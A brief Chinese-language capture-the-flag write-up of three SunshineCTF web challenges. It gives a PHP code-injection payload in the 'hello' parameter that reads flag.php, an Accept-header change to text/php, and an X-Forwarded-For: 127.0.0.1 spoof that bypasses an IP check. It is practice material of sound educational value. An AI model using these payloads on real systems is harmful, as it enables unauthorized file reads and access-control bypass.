sunshine CTF web writeup

发表于

  • Evaluation

    观察源码看到REQUEST函数发现是php文件包含,hello是可控的,构造语句。

    ?hello=);print_r(file(“./flag.php”));// 即可得到flag

  • Marceau

    抓包注意header下的Accept一行

    1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    将其中的text/html修改为text/php,得到flag

  • Home Sweet Home

    抓包直接添加信息 x-forward-for: 127.0.0.1,forward后直接在页面看到flag